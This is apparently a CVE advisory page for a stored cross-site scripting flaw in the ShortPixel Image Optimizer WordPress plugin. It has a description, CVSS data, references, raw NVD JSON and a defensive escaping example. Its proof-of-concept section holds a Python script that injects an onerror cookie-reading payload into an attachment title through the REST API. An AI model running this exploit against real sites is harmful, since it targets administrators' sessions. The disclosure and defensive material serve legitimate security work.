Security Vulnerability Report
CVE-2026-4335 CVSS 5.4 MEDIUM

CVE-2026-4335

Published: 2026-03-26 04:17:13
Last Modified: 2026-04-24 16:35:20

Description

The ShortPixel Image Optimizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the attachment post_title in all versions up to, and including, 6.4.3. This is due to insufficient output escaping in the getEditorPopup() function and its corresponding media-popup.php template. Specifically, the attachment's post_title is retrieved from the database via get_post() in AjaxController.php (line 435) and passed directly to the view template (line 449), where it is rendered into an HTML input element's value attribute without esc_attr() escaping (media-popup.php line 139). Since WordPress allows Authors to set arbitrary attachment titles (including double-quote characters) via the REST API, a malicious author can craft an attachment title that breaks out of the HTML attribute and injects arbitrary JavaScript event handlers. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts that execute whenever a higher-privileged user (such as an administrator) opens the ShortPixel AI editor popup (Background Removal or Image Upscale) for the poisoned attachment.
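The defect the description spells out, a stored title written into a double-quoted value attribute with no attribute escaping, can be reproduced and checked outside WordPress. The Python below is an added example, not code from this page, the plugin or Wordfence: it renders the same input element once the way the description says media-popup.php does and once with html.escape(quote=True) standing in for esc_attr() (both encode &, <, >, " and '), and adds a small check that flags stored attachment titles containing attribute-breaking characters, which a site owner could run over a media-library export while waiting to update. The sample titles, the attachment ids and all function names are constructed for the example.

```python
import html
import re

# Constructed sample attachment titles keyed by attachment id (not real data):
# one ordinary title and one shaped like the attribute breakout the advisory
# describes (a double quote closes value="...", then new markup follows).
SAMPLE_TITLES = {
    7: "Spring newsletter header",
    123: '"><img src=x onerror=alert(1)><input value="',
}

# Characters that end a double-quoted attribute or start a tag, plus an
# inline event-handler pattern; this is a triage heuristic, not a sanitizer.
ATTRIBUTE_BREAKOUT = re.compile(r'["<>]|\bon\w+\s*=', re.IGNORECASE)


def render_title_input_unescaped(title: str) -> str:
    """Models the vulnerable render: the title lands in value= verbatim."""
    return '<input type="text" name="title" value="%s">' % title


def render_title_input_escaped(title: str) -> str:
    """Hardened render: attribute-encode the title before interpolating it.

    html.escape(quote=True) encodes & < > " ' which is what esc_attr() does
    for these characters, so a quote in the title can no longer close value=.
    """
    return '<input type="text" name="title" value="%s">' % html.escape(title, quote=True)


def count_input_elements(markup: str) -> int:
    """Count <input tags in a rendered fragment; the template emits exactly one."""
    return len(re.findall(r"<input\b", markup, re.IGNORECASE))


def find_suspicious_titles(titles: dict) -> list:
    """Return attachment ids whose stored title could break out of value=."""
    return sorted(aid for aid, title in titles.items() if ATTRIBUTE_BREAKOUT.search(title))


def title_round_trips(title: str) -> bool:
    """Escaping is display-safe: the browser decodes it back to the original text."""
    return html.unescape(html.escape(title, quote=True)) == title


if __name__ == "__main__":
    for aid, title in SAMPLE_TITLES.items():
        print("attachment %d unescaped: %s" % (aid, render_title_input_unescaped(title)))
        print("attachment %d escaped:   %s" % (aid, render_title_input_escaped(title)))
    print("titles to review:", find_suspicious_titles(SAMPLE_TITLES))
```

Run stand-alone, the unescaped render of attachment 123 produces two input elements and an img tag, while the escaped render produces a single input whose value attribute still contains the full title as text; the review list contains only attachment 123. The heuristic only covers the double-quoted attribute context the advisory describes; a template that used an unquoted or single-quoted attribute would need the apostrophe added to the character class.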

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

ShortPixel Image Optimizer <= 6.4.3 (no CPE configuration data available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# Exploit Title: ShortPixel Image Optimizer <= 6.4.3 - Stored XSS via Attachment Title
# Description: Updates an attachment title to inject XSS into the admin popup
# Usage: python poc.py <url> <username> <password> <attachment_id>

target_url = "http://target-wordpress-site.com"
wp_user = "author"
wp_pass = "password"
attachment_id = 123

# Command-line arguments, as documented in the usage line, override the defaults
if len(sys.argv) == 5:
    target_url, wp_user, wp_pass = sys.argv[1], sys.argv[2], sys.argv[3]
    attachment_id = int(sys.argv[4])

# 1. Authenticate to obtain the WordPress login cookie
session = requests.Session()
login_data = {
    'log': wp_user,
    'pwd': wp_pass,
    'wp-submit': 'Log In',
    'redirect_to': '%s/wp-admin' % target_url,
}
session.post('%s/wp-login.php' % target_url, data=login_data)

# 2. Retrieve a valid REST API nonce (X-WP-Nonce)
response = session.get('%s/wp-admin/admin.php?page=shortpixel-images' % target_url)
# (In a real scenario, parsing the nonce from the page headers or body is required.)
# For demonstration, this script assumes the REST API is accessible with the
# auth cookie alone and updates the post title directly.

# 3. Prepare the payload
# The payload breaks out of the value attribute: value="[PAYLOAD]"
# A double quote closes the attribute and an onerror event handler is injected
xss_payload = '"><img src=x onerror=alert(document.cookie)><input value="'

# 4. Send the REST API request to update the attachment title
api_endpoint = '%s/wp-json/wp/v2/media/%d' % (target_url, attachment_id)
headers = {'Content-Type': 'application/json'}
data = {'title': xss_payload}
# Note: requires the REST API authentication cookie from the session
response = session.post(api_endpoint, headers=headers, json=data)

if response.status_code == 200:
    print("Payload injected successfully.")
    print("An Administrator must now open the ShortPixel AI editor for attachment %d." % attachment_id)
else:
    print("Failed to inject payload.")
    print(response.text)

References

https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/tags/6.4.3/class/Controller/AjaxController.php#L449
https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/tags/6.4.3/class/view/snippets/media-popup.php#L139
https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/trunk/class/Controller/AjaxController.php#L449
https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/trunk/class/view/snippets/media-popup.php#L139
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3490270%40shortpixel-image-optimiser&new=3490270%40shortpixel-image-optimiser&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/a156234f-2644-4d17-aaa5-4f088cf48f73?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-4335",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-26T04:17:12.810",
    "lastModified": "2026-04-24T16:35:20.070",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The ShortPixel Image Optimizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the attachment post_title in all versions up to, and including, 6.4.3. This is due to insufficient output escaping in the getEditorPopup() function and its corresponding media-popup.php template. Specifically, the attachment's post_title is retrieved from the database via get_post() in AjaxController.php (line 435) and passed directly to the view template (line 449), where it is rendered into an HTML input element's value attribute without esc_attr() escaping (media-popup.php line 139). Since WordPress allows Authors to set arbitrary attachment titles (including double-quote characters) via the REST API, a malicious author can craft an attachment title that breaks out of the HTML attribute and injects arbitrary JavaScript event handlers. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts that execute whenever a higher-privileged user (such as an administrator) opens the ShortPixel AI editor popup (Background Removal or Image Upscale) for the poisoned attachment."
      },
      {
        "lang": "es",
        "value": "El plugin ShortPixel Image Optimizer para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del post_title del adjunto en todas las versiones hasta la 6.4.3, inclusive. Esto se debe a un escape de salida insuficiente en la función getEditorPopup() y su plantilla media-popup.php correspondiente. Específicamente, el post_title del adjunto se recupera de la base de datos a través de get_post() en AjaxController.php (línea 435) y se pasa directamente a la plantilla de vista (línea 449), donde se renderiza en el atributo 'value' de un elemento de entrada HTML sin el escape esc_attr() (media-popup.php línea 139). Dado que WordPress permite a los autores establecer títulos de adjuntos arbitrarios (incluyendo caracteres de comillas dobles) a través de la API REST, un autor malicioso puede crear un título de adjunto que se escapa del atributo HTML e inyecta controladores de eventos JavaScript arbitrarios. Esto hace posible que atacantes autenticados, con acceso de nivel de Autor o superior, inyecten scripts web arbitrarios que se ejecutan cada vez que un usuario con mayores privilegios (como un administrador) abre la ventana emergente del editor de IA de ShortPixel (Eliminación de Fondo o Escalado de Imagen) para el adjunto envenenado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/tags/6.4.3/class/Controller/AjaxController.php#L449", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/tags/6.4.3/class/view/snippets/media-popup.php#L139", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/trunk/class/Controller/AjaxController.php#L449", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/shortpixel-image-optimiser/trunk/class/view/snippets/media-popup.php#L139", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3490270%40shortpixel-image-optimiser&new=3490270%40shortpixel-image-optimiser&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a156234f-2644-4d17-aaa5-4f088cf48f73?source=cve", "source": "[email protected]"}
    ]
  }
}